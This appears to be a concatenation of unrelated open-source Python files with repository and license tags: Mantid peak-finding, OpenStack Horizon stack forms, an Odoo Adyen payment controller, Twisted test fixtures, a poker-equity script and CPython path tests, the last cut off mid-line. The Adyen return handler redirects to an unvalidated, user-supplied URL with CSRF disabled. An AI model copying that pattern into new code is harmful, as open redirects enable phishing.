If this option is not set to the default then all the \ provided satellites will be grouped into exactly this number of modulation (q) vectors") self.declareProperty('ClusterThreshold', 1.5, direction=Direction.Input, doc="Threshold for automaticallty deciding on the number of modulation (q) vectors to use. If NumOfQs found is set then this \ is property is ignored.") self.declareProperty('PeakRadius', 0.1, direction=Direction.Input, doc="The peak radius used to integrate the satellite peaks. This is Euclidean distance in HKL space. \ This is passed directly to IntegratePeaksMD") self.declareProperty('BackgroundInnerRadius', 0.1, direction=Direction.Input, doc="The inner background radius used to integrate the satellite peaks. This is Euclidean distance in HKL space. This is passed directly to \ IntegratePeaksMD") self.declareProperty('BackgroundOuterRadius', 0.2, direction=Direction.Input, doc="The outer background radius used to integrate satellite peaks. TThis is Euclidean distance in HKL space. his is passed directly to \ IntegratePeaksMD") self.declareProperty('IOverSigma', 2, direction=Direction.Input, doc="The I/sigma threshold use to identify if peaks exist. 
This is passed direclty to FilterPeaks") def PyExec(self): k = self.getProperty("NumOfQs").value peak_radius = self.getProperty("PeakRadius").value background_radii = (self.getProperty("BackgroundInnerRadius").value, self.getProperty("BackgroundOuterRadius").value) I_over_sigma = self.getProperty("IOverSigma").value cluster_threshold = self.getProperty("ClusterThreshold").value # if user did not specify the number of qs then # set the k value to None if k == -1: k = None md = self.getProperty("MDWorkspace").value nuclear = self.getProperty("NuclearPeaks").value sats = self.getProperty("SatellitePeaks").value nuclear_hkls = indexing.get_hkls(nuclear) sats_hkls = indexing.get_hkls(sats) qs = indexing.find_q_vectors(nuclear_hkls, sats_hkls) clusters, k = indexing.cluster_qs(qs, threshold=cluster_threshold, k=k) qs = indexing.average_clusters(qs, clusters) predicted_satellites = self.create_fractional_peaks_workspace(qs, nuclear) centroid_satellites = CentroidPeaksMD(InputWorkspace=md, PeaksWorkspace=predicted_satellites, PeakRadius=peak_radius, StoreInADS=False) satellites_int_spherical = IntegratePeaksMD(InputWorkspace=md, PeaksWorkspace=centroid_satellites, PeakRadius=peak_radius, BackgroundInnerRadius=background_radii[0], BackgroundOuterRadius=background_radii[1], IntegrateIfOnEdge=True, StoreInADS=False) satellites_int_spherical = FilterPeaks(satellites_int_spherical, FilterVariable="Intensity", FilterValue=0, Operator=">", StoreInADS=False) satellites_int_spherical = FilterPeaks(satellites_int_spherical, FilterVariable="Signal/Noise", FilterValue=I_over_sigma, Operator=">", StoreInADS=False) self.log().notice("Q vectors are: \n{}".format(qs)) self.setProperty("OutputWorkspace", satellites_int_spherical) def create_fractional_peaks_workspace(self, qs, nuclear): """Generate a peaks workspace of possible satellite peaks from a list of q vectors. :param qs: list of q vectors to use to generate fractional peaks. :param nuclear: list of integer HKL peak positions. 
:returns: PeaksWorkspace -- containing predicted locations of satellite peaks. """ predicted_satellites = CloneWorkspace(nuclear, StoreInADS=False) for _ in range(predicted_satellites.getNumberPeaks()): predicted_satellites.removePeak(0) for q in qs: predicted_q = PredictFractionalPeaks(nuclear, HOffset=q[0], KOffset=q[1], LOffset=q[2], StoreInADS=False, FracPeaks='predicted_q') predicted_satellites = CombinePeaksWorkspaces(predicted_satellites, predicted_q, StoreInADS=False, OutputWorkspace='predicted_satellites') return predicted_satellites AlgorithmFactory.subscribe(FindSatellitePeaks)
gpl-3.0
Daniex/horizon
openstack_dashboard/dashboards/project/stacks/forms.py
24
18343
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import json import logging from django.utils import html from django.utils.translation import ugettext_lazy as _ from django.views.decorators.debug import sensitive_variables # noqa from oslo_utils import strutils import six from horizon import exceptions from horizon import forms from horizon import messages from openstack_dashboard import api from openstack_dashboard.dashboards.project.images \ import utils as image_utils from openstack_dashboard.dashboards.project.instances \ import utils as instance_utils LOG = logging.getLogger(__name__) def create_upload_form_attributes(prefix, input_type, name): """Creates attribute dicts for the switchable upload form :type prefix: str :param prefix: prefix (environment, template) of field :type input_type: str :param input_type: field type (file, raw, url) :type name: str :param name: translated text label to display to user :rtype: dict :return: an attribute set to pass to form build """ attributes = {'class': 'switched', 'data-switch-on': prefix + 'source'} attributes['data-' + prefix + 'source-' + input_type] = name return attributes class TemplateForm(forms.SelfHandlingForm): class Meta(object): name = _('Select Template') help_text = _('Select a template to launch a stack.') # TODO(jomara) - update URL choice for template & environment files # w/ client side download when applicable base_choices = [('file', _('File')), ('raw', _('Direct Input'))] url_choice = [('url', _('URL'))] 
attributes = {'class': 'switchable', 'data-slug': 'templatesource'} template_source = forms.ChoiceField(label=_('Template Source'), choices=base_choices + url_choice, widget=forms.Select(attrs=attributes)) attributes = create_upload_form_attributes( 'template', 'file', _('Template File')) template_upload = forms.FileField( label=_('Template File'), help_text=_('A local template to upload.'), widget=forms.FileInput(attrs=attributes), required=False) attributes = create_upload_form_attributes( 'template', 'url', _('Template URL')) template_url = forms.URLField( label=_('Template URL'), help_text=_('An external (HTTP) URL to load the template from.'), widget=forms.TextInput(attrs=attributes), required=False) attributes = create_upload_form_attributes( 'template', 'raw', _('Template Data')) template_data = forms.CharField( label=_('Template Data'), help_text=_('The raw contents of the template.'), widget=forms.widgets.Textarea(attrs=attributes), required=False) attributes = {'data-slug': 'envsource', 'class': 'switchable'} environment_source = forms.ChoiceField( label=_('Environment Source'), choices=base_choices, widget=forms.Select(attrs=attributes), required=False) attributes = create_upload_form_attributes( 'env', 'file', _('Environment File')) environment_upload = forms.FileField( label=_('Environment File'), help_text=_('A local environment to upload.'), widget=forms.FileInput(attrs=attributes), required=False) attributes = create_upload_form_attributes( 'env', 'raw', _('Environment Data')) environment_data = forms.CharField( label=_('Environment Data'), help_text=_('The raw contents of the environment file.'), widget=forms.widgets.Textarea(attrs=attributes), required=False) def __init__(self, *args, **kwargs): self.next_view = kwargs.pop('next_view') super(TemplateForm, self).__init__(*args, **kwargs) def clean(self): cleaned = super(TemplateForm, self).clean() files = self.request.FILES self.clean_uploaded_files('template', _('template'), cleaned, files) 
self.clean_uploaded_files('environment', _('environment'), cleaned, files) # Validate the template and get back the params. kwargs = {} if cleaned['template_data']: kwargs['template'] = cleaned['template_data'] else: kwargs['template_url'] = cleaned['template_url'] if cleaned['environment_data']: kwargs['environment'] = cleaned['environment_data'] try: validated = api.heat.template_validate(self.request, **kwargs) cleaned['template_validate'] = validated except Exception as e: raise forms.ValidationError(unicode(e)) return cleaned def clean_uploaded_files(self, prefix, field_label, cleaned, files): """Cleans Template & Environment data from form upload. Does some of the crunchy bits for processing uploads vs raw data depending on what the user specified. Identical process for environment data & template data. :type prefix: str :param prefix: prefix (environment, template) of field :type field_label: str :param field_label: translated prefix str for messages :type input_type: dict :param prefix: existing cleaned fields from form :rtype: dict :return: cleaned dict including environment & template data """ upload_str = prefix + "_upload" data_str = prefix + "_data" url = cleaned.get(prefix + '_url') data = cleaned.get(prefix + '_data') has_upload = upload_str in files # Uploaded file handler if has_upload and not url: log_template_name = files[upload_str].name LOG.info('got upload %s' % log_template_name) tpl = files[upload_str].read() if tpl.startswith('{'): try: json.loads(tpl) except Exception as e: msg = _('There was a problem parsing the' ' %(prefix)s: %(error)s') msg = msg % {'prefix': prefix, 'error': e} raise forms.ValidationError(msg) cleaned[data_str] = tpl # URL handler elif url and (has_upload or data): msg = _('Please specify a %s using only one source method.') msg = msg % field_label raise forms.ValidationError(msg) elif prefix == 'template': # Check for raw template input - blank environment allowed if not url and not data: msg = _('You must specify a 
template via one of the ' 'available sources.') raise forms.ValidationError(msg) def create_kwargs(self, data): kwargs = {'parameters': data['template_validate'], 'environment_data': data['environment_data'], 'template_data': data['template_data'], 'template_url': data['template_url']} if data.get('stack_id'): kwargs['stack_id'] = data['stack_id'] return kwargs def handle(self, request, data): kwargs = self.create_kwargs(data) # NOTE (gabriel): This is a bit of a hack, essentially rewriting this # request so that we can chain it as an input to the next view... # but hey, it totally works. request.method = 'GET' return self.next_view.as_view()(request, **kwargs) class ChangeTemplateForm(TemplateForm): class Meta(object): name = _('Edit Template') help_text = _('Select a new template to re-launch a stack.') stack_id = forms.CharField(label=_('Stack ID'), widget=forms.widgets.HiddenInput) stack_name = forms.CharField(label=_('Stack Name'), widget=forms.TextInput(attrs={'readonly': 'readonly'})) class PreviewTemplateForm(TemplateForm): class Meta(object): name = _('Preview Template') help_text = _('Select a new template to preview a stack.') class CreateStackForm(forms.SelfHandlingForm): param_prefix = '__param_' class Meta(object): name = _('Create Stack') template_data = forms.CharField( widget=forms.widgets.HiddenInput, required=False) template_url = forms.CharField( widget=forms.widgets.HiddenInput, required=False) environment_data = forms.CharField( widget=forms.widgets.HiddenInput, required=False) parameters = forms.CharField( widget=forms.widgets.HiddenInput) stack_name = forms.RegexField( max_length=255, label=_('Stack Name'), help_text=_('Name of the stack to create.'), regex=r"^[a-zA-Z][a-zA-Z0-9_.-]*$", error_messages={'invalid': _('Name must start with a letter and may ' 'only contain letters, numbers, underscores, ' 'periods and hyphens.')}) timeout_mins = forms.IntegerField( initial=60, label=_('Creation Timeout (minutes)'), help_text=_('Stack creation 
timeout in minutes.')) enable_rollback = forms.BooleanField( label=_('Rollback On Failure'), help_text=_('Enable rollback on create/update failure.'), required=False) def __init__(self, *args, **kwargs): parameters = kwargs.pop('parameters') # special case: load template data from API, not passed in params if(kwargs.get('validate_me')): parameters = kwargs.pop('validate_me') super(CreateStackForm, self).__init__(*args, **kwargs) self._build_parameter_fields(parameters) def _build_parameter_fields(self, template_validate): self.fields['password'] = forms.CharField( label=_('Password for user "%s"') % self.request.user.username, help_text=_('This is required for operations to be performed ' 'throughout the lifecycle of the stack'), widget=forms.PasswordInput()) self.help_text = template_validate['Description'] params = template_validate.get('Parameters', {}) if template_validate.get('ParameterGroups'): params_in_order = [] for group in template_validate['ParameterGroups']: for param in group.get('parameters', []): if param in params: params_in_order.append((param, params[param])) else: # no parameter groups, simply sorted to make the order fixed params_in_order = sorted(params.items()) for param_key, param in params_in_order: field = None field_key = self.param_prefix + param_key field_args = { 'initial': param.get('Default', None), 'label': param.get('Label', param_key), 'help_text': html.escape(param.get('Description', '')), 'required': param.get('Default', None) is None } param_type = param.get('Type', None) hidden = strutils.bool_from_string(param.get('NoEcho', 'false')) if 'CustomConstraint' in param: choices = self._populate_custom_choices( param['CustomConstraint']) field_args['choices'] = choices field = forms.ChoiceField(**field_args) elif 'AllowedValues' in param: choices = map(lambda x: (x, x), param['AllowedValues']) field_args['choices'] = choices field = forms.ChoiceField(**field_args) elif param_type == 'Json' and 'Default' in param: 
field_args['initial'] = json.dumps(param['Default']) field = forms.CharField(**field_args) elif param_type in ('CommaDelimitedList', 'String', 'Json'): if 'MinLength' in param: field_args['min_length'] = int(param['MinLength']) field_args['required'] = param.get('MinLength', 0) > 0 if 'MaxLength' in param: field_args['max_length'] = int(param['MaxLength']) if hidden: field_args['widget'] = forms.PasswordInput() field = forms.CharField(**field_args) elif param_type == 'Number': if 'MinValue' in param: field_args['min_value'] = int(param['MinValue']) if 'MaxValue' in param: field_args['max_value'] = int(param['MaxValue']) field = forms.IntegerField(**field_args) # heat-api currently returns the boolean type in lowercase # (see https://bugs.launchpad.net/heat/+bug/1361448) # so for better compatibility both are checked here elif param_type in ('Boolean', 'boolean'): field = forms.BooleanField(**field_args) if field: self.fields[field_key] = field @sensitive_variables('password') def handle(self, request, data): prefix_length = len(self.param_prefix) params_list = [(k[prefix_length:], v) for (k, v) in six.iteritems(data) if k.startswith(self.param_prefix)] fields = { 'stack_name': data.get('stack_name'), 'timeout_mins': data.get('timeout_mins'), 'disable_rollback': not(data.get('enable_rollback')), 'parameters': dict(params_list), 'password': data.get('password') } if data.get('template_data'): fields['template'] = data.get('template_data') else: fields['template_url'] = data.get('template_url') if data.get('environment_data'): fields['environment'] = data.get('environment_data') try: api.heat.stack_create(self.request, **fields) messages.success(request, _("Stack creation started.")) return True except Exception: exceptions.handle(request) def _populate_custom_choices(self, custom_type): if custom_type == 'neutron.network': return instance_utils.network_field_data(self.request, True) if custom_type == 'nova.keypair': return 
instance_utils.keypair_field_data(self.request, True) if custom_type == 'glance.image': return image_utils.image_field_data(self.request, True) if custom_type == 'nova.flavor': return instance_utils.flavor_field_data(self.request, True) return [] class EditStackForm(CreateStackForm): class Meta(object): name = _('Update Stack Parameters') stack_id = forms.CharField( label=_('Stack ID'), widget=forms.widgets.HiddenInput) stack_name = forms.CharField( label=_('Stack Name'), widget=forms.TextInput(attrs={'readonly': 'readonly'})) @sensitive_variables('password') def handle(self, request, data): prefix_length = len(self.param_prefix) params_list = [(k[prefix_length:], v) for (k, v) in six.iteritems(data) if k.startswith(self.param_prefix)] stack_id = data.get('stack_id') fields = { 'stack_name': data.get('stack_name'), 'timeout_mins': data.get('timeout_mins'), 'disable_rollback': not(data.get('enable_rollback')), 'parameters': dict(params_list), 'password': data.get('password') } # if the user went directly to this form, resubmit the existing # template data. 
otherwise, submit what they had from the first form if data.get('template_data'): fields['template'] = data.get('template_data') elif data.get('template_url'): fields['template_url'] = data.get('template_url') elif data.get('parameters'): fields['template'] = data.get('parameters') try: api.heat.stack_update(self.request, stack_id=stack_id, **fields) messages.success(request, _("Stack update started.")) return True except Exception: exceptions.handle(request) class PreviewStackForm(CreateStackForm): class Meta(object): name = _('Preview Stack Parameters') def __init__(self, *args, **kwargs): self.next_view = kwargs.pop('next_view') super(CreateStackForm, self).__init__(*args, **kwargs) def handle(self, request, data): prefix_length = len(self.param_prefix) params_list = [(k[prefix_length:], v) for (k, v) in six.iteritems(data) if k.startswith(self.param_prefix)] fields = { 'stack_name': data.get('stack_name'), 'timeout_mins': data.get('timeout_mins'), 'disable_rollback': not(data.get('enable_rollback')), 'parameters': dict(params_list), } if data.get('template_data'): fields['template'] = data.get('template_data') else: fields['template_url'] = data.get('template_url') if data.get('environment_data'): fields['environment'] = data.get('environment_data') try: stack_preview = api.heat.stack_preview(self.request, **fields) request.method = 'GET' return self.next_view.as_view()(request, stack_preview=stack_preview) except Exception: exceptions.handle(request)
apache-2.0
levkar/odoo
addons/payment_adyen/controllers/main.py
41
1772
# -*- coding: utf-8 -*- import json import logging import pprint import werkzeug from odoo import http from odoo.http import request _logger = logging.getLogger(__name__) class AdyenController(http.Controller): _return_url = '/payment/adyen/return/' @http.route([ '/payment/adyen/return', ], type='http', auth='none', csrf=False) def adyen_return(self, **post): _logger.info('Beginning Adyen form_feedback with post data %s', pprint.pformat(post)) # debug if post.get('authResult') not in ['CANCELLED']: request.env['payment.transaction'].sudo().form_feedback(post, 'adyen') return_url = post.pop('return_url', '') if not return_url: custom = json.loads(post.pop('merchantReturnData', '{}')) return_url = custom.pop('return_url', '/') return werkzeug.utils.redirect(return_url) @http.route([ '/payment/adyen/notification', ], type='http', auth='none', methods=['POST'], csrf=False) def adyen_notification(self, **post): tx = post.get('merchantReference') and request.env['payment.transaction'].sudo().search([('reference', 'in', [post.get('merchantReference')])], limit=1) if post.get('eventCode') in ['AUTHORISATION'] and tx: states = (post.get('merchantReference'), post.get('success'), tx.state) if (post.get('success') == 'true' and tx.state == 'done') or (post.get('success') == 'false' and tx.state in ['cancel', 'error']): _logger.info('Notification from Adyen for the reference %s: received %s, state is %s', states) else: _logger.warning('Notification from Adyen for the reference %s: received %s but state is %s', states) return '[accepted]'
agpl-3.0
proxysh/Safejumper-for-Mac
buildlinux/env64/lib/python2.7/site-packages/twisted/trial/test/erroneous.py
24
4274
# -*- test-case-name: twisted.trial.test.test_tests -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Definitions of test cases with various interesting error-related behaviors, to be used by test modules to exercise different features of trial's test runner. See the L{twisted.trial.test.test_tests} module docstring for details about how this code is arranged. """ from __future__ import division, absolute_import from twisted.trial import unittest, util from twisted.internet import reactor, protocol, defer class FoolishError(Exception): pass class FailureInSetUpMixin(object): def setUp(self): raise FoolishError("I am a broken setUp method") def test_noop(self): pass class SynchronousTestFailureInSetUp( FailureInSetUpMixin, unittest.SynchronousTestCase): pass class AsynchronousTestFailureInSetUp( FailureInSetUpMixin, unittest.TestCase): pass class FailureInTearDownMixin(object): def tearDown(self): raise FoolishError("I am a broken tearDown method") def test_noop(self): pass class SynchronousTestFailureInTearDown( FailureInTearDownMixin, unittest.SynchronousTestCase): pass class AsynchronousTestFailureInTearDown( FailureInTearDownMixin, unittest.TestCase): pass class TestRegularFail(unittest.SynchronousTestCase): def test_fail(self): self.fail("I fail") def test_subfail(self): self.subroutine() def subroutine(self): self.fail("I fail inside") class TestAsynchronousFail(unittest.TestCase): """ Test failures for L{unittest.TestCase} based classes. """ def test_fail(self): """ A test which fails in the callback of the returned L{defer.Deferred}. """ d = defer.Deferred() d.addCallback(self._later) reactor.callLater(0, d.callback, None) return d def _later(self, res): self.fail("I fail later") def test_exception(self): """ A test which raises an exception synchronously. """ raise Exception("I fail") class ErrorTest(unittest.SynchronousTestCase): """ A test case which has a L{test_foo} which will raise an error. 
@ivar ran: boolean indicating whether L{test_foo} has been run. """ ran = False def test_foo(self): """ Set C{self.ran} to True and raise a C{ZeroDivisionError} """ self.ran = True 1/0 class TestSkipTestCase(unittest.SynchronousTestCase): pass TestSkipTestCase.skip = "skipping this test" class DelayedCall(unittest.TestCase): hiddenExceptionMsg = "something blew up" def go(self): raise RuntimeError(self.hiddenExceptionMsg) def testHiddenException(self): """ What happens if an error is raised in a DelayedCall and an error is also raised in the test? L{test_reporter.ErrorReportingTests.testHiddenException} checks that both errors get reported. Note that this behaviour is deprecated. A B{real} test would return a Deferred that got triggered by the callLater. This would guarantee the delayed call error gets reported. """ reactor.callLater(0, self.go) reactor.iterate(0.01) self.fail("Deliberate failure to mask the hidden exception") testHiddenException.suppress = [util.suppress( message=r'reactor\.iterate cannot be used.*', category=DeprecationWarning)] class ReactorCleanupTests(unittest.TestCase): def test_leftoverPendingCalls(self): def _(): print('foo!') reactor.callLater(10000.0, _) class SocketOpenTest(unittest.TestCase): def test_socketsLeftOpen(self): f = protocol.Factory() f.protocol = protocol.Protocol reactor.listenTCP(0, f) class TimingOutDeferred(unittest.TestCase): def test_alpha(self): pass def test_deferredThatNeverFires(self): self.methodCalled = True d = defer.Deferred() return d def test_omega(self): pass def unexpectedException(self): """i will raise an unexpected exception... ... *CAUSE THAT'S THE KINDA GUY I AM* >>> 1/0 """
gpl-2.0
aldanor/ray_eval
ngbbtest.py
1
1817
# -*- coding: utf-8 -*- import rayeval import time if __name__ == '__main__': # rayeval.load_handranks('HandRanks.dat') rayeval.load_handranks_9('/usr/local/shared/rayeval_hand_ranks_9.dat') board = 'Ks Jd 9d * *' pockets = ['9s Kd 4d 6c'] iterations = 1e6 t0 = time.time() ngbb = rayeval.eval_turn_outs_vs_random_omaha(board, pockets[0], iterations) elapsed = time.time() - t0 print '[%s]' % pockets, 'on board [%s]' % board print 'Elapsed: %.2f seconds (%.2fM iterations / sec).\n' % (elapsed, iterations / elapsed / 1e6) for item in sorted(ngbb.items(), key=lambda x : x[1], reverse=True): print item flop_ev = ngbb['flop_ev'] outs = ngbb['outs'] nuts = good = blank = bad = 0 for k in outs: ev = outs[k] if ev >= 0.98: nuts = nuts + 1 elif ev >= flop_ev + 0.1: good = good + 1 elif ev <= flop_ev - 0.1: bad = bad + 1 else: blank = blank + 1 print '[Nuts-Good-Blank-Bad] = [%d-%d-%d-%d]' % (nuts, good, blank, bad) print '' import pokereval pockets = pockets + ['* * * *'] t0 = time.time() board_pe = ['__' if b == '*' else b for b in board.split(' ')] pocket_pe = [['__' if c == '*' else c for c in p.split(' ')] for p in pockets] res = pokereval.PokerEval().poker_eval(game='omaha', board=board_pe, pockets=pocket_pe, iterations=int(iterations)) elapsed = time.time() - t0 print '[%s]' % 'pokereval', pockets[:1], 'vs', pockets[1:], 'on board [%s]' % board, ( ': EV = %.4f%% (%.2gM iterations).' % (res['eval'][0]['ev'] / 10., iterations / 1e6)) print 'Elapsed: %.2f seconds (%.2fM iterations / sec).' % ( elapsed, iterations / elapsed / 1e6)
gpl-2.0
blacklin/kbengine
kbe/res/scripts/common/Lib/test/test_genericpath.py
81
16219
""" Tests common to genericpath, macpath, ntpath and posixpath """ import genericpath import os import sys import unittest import warnings from test import support def safe_rmdir(dirname): try: os.rmdir(dirname) except OSError: pass class GenericTest: common_attributes = ['commonprefix', 'getsize', 'getatime', 'getctime', 'getmtime', 'exists', 'isdir', 'isfile'] attributes = [] def test_no_argument(self): for attr in self.common_attributes + self.attributes: with self.assertRaises(TypeError): getattr(self.pathmodule, attr)() raise self.fail("{}.{}() did not raise a TypeError" .format(self.pathmodule.__name__, attr)) def test_commonprefix(self): commonprefix = self.pathmodule.commonprefix self.assertEqual( commonprefix([]), "" ) self.assertEqual( commonprefix(["/home/swenson/spam", "/home/swen/spam"]), "/home/swen" ) self.assertEqual( commonprefix(["/home/swen/spam", "/home/swen/eggs"]), "/home/swen/" ) self.assertEqual( commonprefix(["/home/swen/spam", "/home/swen/spam"]), "/home/swen/spam" ) self.assertEqual( commonprefix(["home:swenson:spam", "home:swen:spam"]), "home:swen" ) self.assertEqual( commonprefix([":home:swen:spam", ":home:swen:eggs"]), ":home:swen:" ) self.assertEqual( commonprefix([":home:swen:spam", ":home:swen:spam"]), ":home:swen:spam" ) self.assertEqual( commonprefix([b"/home/swenson/spam", b"/home/swen/spam"]), b"/home/swen" ) self.assertEqual( commonprefix([b"/home/swen/spam", b"/home/swen/eggs"]), b"/home/swen/" ) self.assertEqual( commonprefix([b"/home/swen/spam", b"/home/swen/spam"]), b"/home/swen/spam" ) self.assertEqual( commonprefix([b"home:swenson:spam", b"home:swen:spam"]), b"home:swen" ) self.assertEqual( commonprefix([b":home:swen:spam", b":home:swen:eggs"]), b":home:swen:" ) self.assertEqual( commonprefix([b":home:swen:spam", b":home:swen:spam"]), b":home:swen:spam" ) testlist = ['', 'abc', 'Xbcd', 'Xb', 'XY', 'abcd', 'aXc', 'abd', 'ab', 'aX', 'abcX'] for s1 in testlist: for s2 in testlist: p = commonprefix([s1, s2]) 
self.assertTrue(s1.startswith(p)) self.assertTrue(s2.startswith(p)) if s1 != s2: n = len(p) self.assertNotEqual(s1[n:n+1], s2[n:n+1]) def test_getsize(self): f = open(support.TESTFN, "wb") try: f.write(b"foo") f.close() self.assertEqual(self.pathmodule.getsize(support.TESTFN), 3) finally: if not f.closed: f.close() support.unlink(support.TESTFN) def test_time(self): f = open(support.TESTFN, "wb") try: f.write(b"foo") f.close() f = open(support.TESTFN, "ab") f.write(b"bar") f.close() f = open(support.TESTFN, "rb") d = f.read() f.close() self.assertEqual(d, b"foobar") self.assertLessEqual( self.pathmodule.getctime(support.TESTFN), self.pathmodule.getmtime(support.TESTFN) ) finally: if not f.closed: f.close() support.unlink(support.TESTFN) def test_exists(self): self.assertIs(self.pathmodule.exists(support.TESTFN), False) f = open(support.TESTFN, "wb") try: f.write(b"foo") f.close() self.assertIs(self.pathmodule.exists(support.TESTFN), True) if not self.pathmodule == genericpath: self.assertIs(self.pathmodule.lexists(support.TESTFN), True) finally: if not f.close(): f.close() support.unlink(support.TESTFN) @unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()") def test_exists_fd(self): r, w = os.pipe() try: self.assertTrue(self.pathmodule.exists(r)) finally: os.close(r) os.close(w) self.assertFalse(self.pathmodule.exists(r)) def test_isdir(self): self.assertIs(self.pathmodule.isdir(support.TESTFN), False) f = open(support.TESTFN, "wb") try: f.write(b"foo") f.close() self.assertIs(self.pathmodule.isdir(support.TESTFN), False) os.remove(support.TESTFN) os.mkdir(support.TESTFN) self.assertIs(self.pathmodule.isdir(support.TESTFN), True) os.rmdir(support.TESTFN) finally: if not f.close(): f.close() support.unlink(support.TESTFN) safe_rmdir(support.TESTFN) def test_isfile(self): self.assertIs(self.pathmodule.isfile(support.TESTFN), False) f = open(support.TESTFN, "wb") try: f.write(b"foo") f.close() self.assertIs(self.pathmodule.isfile(support.TESTFN), True) 
os.remove(support.TESTFN) os.mkdir(support.TESTFN) self.assertIs(self.pathmodule.isfile(support.TESTFN), False) os.rmdir(support.TESTFN) finally: if not f.close(): f.close() support.unlink(support.TESTFN) safe_rmdir(support.TESTFN) @staticmethod def _create_file(filename): with open(filename, 'wb') as f: f.write(b'foo') def test_samefile(self): try: test_fn = support.TESTFN + "1" self._create_file(test_fn) self.assertTrue(self.pathmodule.samefile(test_fn, test_fn)) self.assertRaises(TypeError, self.pathmodule.samefile) finally: os.remove(test_fn) @support.skip_unless_symlink def test_samefile_on_symlink(self): self._test_samefile_on_link_func(os.symlink) def test_samefile_on_link(self): self._test_samefile_on_link_func(os.link) def _test_samefile_on_link_func(self, func): try: test_fn1 = support.TESTFN + "1" test_fn2 = support.TESTFN + "2" self._create_file(test_fn1) func(test_fn1, test_fn2) self.assertTrue(self.pathmodule.samefile(test_fn1, test_fn2)) os.remove(test_fn2) self._create_file(test_fn2) self.assertFalse(self.pathmodule.samefile(test_fn1, test_fn2)) finally: os.remove(test_fn1) os.remove(test_fn2) def test_samestat(self): try: test_fn = support.TESTFN + "1" self._create_file(test_fn) test_fns = [test_fn]*2 stats = map(os.stat, test_fns) self.assertTrue(self.pathmodule.samestat(*stats)) finally: os.remove(test_fn) @support.skip_unless_symlink def test_samestat_on_symlink(self): self._test_samestat_on_link_func(os.symlink) def test_samestat_on_link(self): self._test_samestat_on_link_func(os.link) def _test_samestat_on_link_func(self, func): try: test_fn1 = support.TESTFN + "1" test_fn2 = support.TESTFN + "2" self._create_file(test_fn1) test_fns = (test_fn1, test_fn2) func(*test_fns) stats = map(os.stat, test_fns) self.assertTrue(self.pathmodule.samestat(*stats)) os.remove(test_fn2) self._create_file(test_fn2) stats = map(os.stat, test_fns) self.assertFalse(self.pathmodule.samestat(*stats)) self.assertRaises(TypeError, self.pathmodule.samestat) finally: 
os.remove(test_fn1) os.remove(test_fn2) def test_sameopenfile(self): fname = support.TESTFN + "1" with open(fname, "wb") as a, open(fname, "wb") as b: self.assertTrue(self.pathmodule.sameopenfile( a.fileno(), b.fileno())) class TestGenericTest(GenericTest, unittest.TestCase): # Issue 16852: GenericTest can't inherit from unittest.TestCase # for test discovery purposes; CommonTest inherits from GenericTest # and is only meant to be inherited by others. pathmodule = genericpath # Following TestCase is not supposed to be run from test_genericpath. # It is inherited by other test modules (macpath, ntpath, posixpath). class CommonTest(GenericTest): common_attributes = GenericTest.common_attributes + [ # Properties 'curdir', 'pardir', 'extsep', 'sep', 'pathsep', 'defpath', 'altsep', 'devnull', # Methods 'normcase', 'splitdrive', 'expandvars', 'normpath', 'abspath', 'join', 'split', 'splitext', 'isabs', 'basename', 'dirname', 'lexists', 'islink', 'ismount', 'expanduser', 'normpath', 'realpath', ] def test_normcase(self): normcase = self.pathmodule.normcase # check that normcase() is idempotent for p in ["FoO/./BaR", b"FoO/./BaR"]: p = normcase(p) self.assertEqual(p, normcase(p)) self.assertEqual(normcase(''), '') self.assertEqual(normcase(b''), b'') # check that normcase raises a TypeError for invalid types for path in (None, True, 0, 2.5, [], bytearray(b''), {'o','o'}): self.assertRaises(TypeError, normcase, path) def test_splitdrive(self): # splitdrive for non-NT paths splitdrive = self.pathmodule.splitdrive self.assertEqual(splitdrive("/foo/bar"), ("", "/foo/bar")) self.assertEqual(splitdrive("foo:bar"), ("", "foo:bar")) self.assertEqual(splitdrive(":foo:bar"), ("", ":foo:bar")) self.assertEqual(splitdrive(b"/foo/bar"), (b"", b"/foo/bar")) self.assertEqual(splitdrive(b"foo:bar"), (b"", b"foo:bar")) self.assertEqual(splitdrive(b":foo:bar"), (b"", b":foo:bar")) def test_expandvars(self): if self.pathmodule.__name__ == 'macpath': self.skipTest('macpath.expandvars is a 
stub') expandvars = self.pathmodule.expandvars with support.EnvironmentVarGuard() as env: env.clear() env["foo"] = "bar" env["{foo"] = "baz1" env["{foo}"] = "baz2" self.assertEqual(expandvars("foo"), "foo") self.assertEqual(expandvars("$foo bar"), "bar bar") self.assertEqual(expandvars("${foo}bar"), "barbar") self.assertEqual(expandvars("$[foo]bar"), "$[foo]bar") self.assertEqual(expandvars("$bar bar"), "$bar bar") self.assertEqual(expandvars("$?bar"), "$?bar") self.assertEqual(expandvars("$foo}bar"), "bar}bar") self.assertEqual(expandvars("${foo"), "${foo") self.assertEqual(expandvars("${{foo}}"), "baz1}") self.assertEqual(expandvars("$foo$foo"), "barbar") self.assertEqual(expandvars("$bar$bar"), "$bar$bar") self.assertEqual(expandvars(b"foo"), b"foo") self.assertEqual(expandvars(b"$foo bar"), b"bar bar") self.assertEqual(expandvars(b"${foo}bar"), b"barbar") self.assertEqual(expandvars(b"$[foo]bar"), b"$[foo]bar") self.assertEqual(expandvars(b"$bar bar"), b"$bar bar") self.assertEqual(expandvars(b"$?bar"), b"$?bar") self.assertEqual(expandvars(b"$foo}bar"), b"bar}bar") self.assertEqual(expandvars(b"${foo"), b"${foo") self.assertEqual(expandvars(b"${{foo}}"), b"baz1}") self.assertEqual(expandvars(b"$foo$foo"), b"barbar") self.assertEqual(expandvars(b"$bar$bar"), b"$bar$bar") @unittest.skipUnless(support.FS_NONASCII, 'need support.FS_NONASCII') def test_expandvars_nonascii(self): if self.pathmodule.__name__ == 'macpath': self.skipTest('macpath.expandvars is a stub') expandvars = self.pathmodule.expandvars def check(value, expected): self.assertEqual(expandvars(value), expected) with support.EnvironmentVarGuard() as env: env.clear() nonascii = support.FS_NONASCII env['spam'] = nonascii env[nonascii] = 'ham' + nonascii check(nonascii, nonascii) check('$spam bar', '%s bar' % nonascii) check('${spam}bar', '%sbar' % nonascii) check('${%s}bar' % nonascii, 'ham%sbar' % 